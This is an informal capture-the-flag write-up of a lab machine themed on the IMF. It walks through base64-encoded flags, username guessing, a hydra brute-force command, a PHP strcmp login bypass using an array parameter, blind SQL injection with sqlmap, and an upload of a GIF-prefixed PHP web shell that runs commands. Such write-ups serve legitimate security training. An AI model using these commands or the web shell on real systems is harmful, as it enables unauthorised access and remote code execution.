On the contact us page we get 3 emails:
rmichaels@imf.local -> Director
akeith@imf.local -> deputy Director
estone@imf.local -> chief of staff
While checking the source code of this page we get the first flag:
flag1{YWxsdGhlZmlsZXM=}
the flag itself was base64 encoded said: allthefiles
from the hist above:
we also get the second flag by decoding the names of the js files :
http://192.168.29.156/js/eVlYUnZjZz09fQ==.min.js -> 3
http://192.168.29.156/js/XUnRhVzVwYzNS.js -> 2
http://192.168.29.156/js/ZmxhZzJ7YVcxbVl.js -> 1
combining then we get the flag:
flag2{aW1mYWRtaW5pc3RyYXRvcg==} , hint: imfadministrator
After a bit of finding , I thought maybe it was an endpoint and it was leading to a login page:
Ofcourse admin:admin didn't work:
This was the source code:
SQL injection maybe? but code said password is hard-coded , also error said 'invalid username' so username enum?
let's make the list:
roger
alexander
elizabeth
admin
imfadmin
rmichaels
akeith
estone
rmichaels@imf.local
akeith@imf.local
estone@imf.local
Nothing worked so I tried to automate the things , I used hydra to do so the command and the wordlists for the username and passwords are below:
hydra -L /usr/share/wordlists/seclists/Usernames/Names/names.txt -P /usr/share/wordlists/rockyou.txt -s 80 -f http-get://192.168.90.184/imfadministrator
seclists's Names/names.txt and rockyou.txt for password
got: aaliyah and 123456
That didn't work so I tried something different:
look how for the same username but different , something wasn't right so I tried some username that they won't give:
I'm telling y'all this so that you might see that this is what happens and people get stuck for hours
This is due to the fact that it loads the site with 200 but gives error text not response
So I used Burp:
I also tried brtfrcing the password , nothing worked , so I tried directory enum on this endpoint:
I also looked at the source code again , this had my curiosity:
If it doesn't say anything about password , just invalid username and all , then why it is taking the password as 'pass'
Maybe in the back-end they mean by hardcoded is the password is already set and they are comparing the pass string we give to the already set so maybe we have to deal with this function that compares the string? we can only guess...so maybe bypassing the strcmp function:
In the strcmp description by php we get this guy at last telling about the behaviour of the function:
We need to make sure that the pass array is empty so we can do this via two ways:
way 1: burp intruder:
way 2 : via array('') :
just paste the above payload in password field
flag3{Y29udGludWVUT2Ntcw==}
hint: continueTOcms
Disallowed list:
Upload:
I tried this image , analyzed it and via exif tool I got this:
after using the -b flag:
and strings command we get:
inside the cms , pagename parameter:
when we make the sqlmap to make sure:
we have to supply our session id or else it'll reject:
sqlmap --url http://192.168.90.184/imfadministrator/cms.php?pagename=disavowlist --cookie='PHPSESSID=9rn93n6m80d9hbtk2c6rkc0o75'
we can do this manually :
' AND '1'='1
it's blind so we'll have to use sqlmap:
and via that we can find the tables via --tables options and dump them via:
sqlmap --url http://192.168.90.184/imfadministrator/cms.php?pagename=disavowlist --cookie='PHPSESSID=9rn93n6m80d9hbtk2c6rkc0o75' --dump -T pages
scan the QR and find the flag flag4{dXBsb2Fkcjk0Mi5waHA=}
decode it and we get: uploadr942.php
When we go to this page we see this upload functionality:
We need to fool the WAF by passing it in the GIF format via adding the GIF98 in the start:
GIF98
<?php $c=$_GET['cmd']; echo `$c`;?>
flag5{YWdlbnRzZXJ2aWNlcw==}
agentservices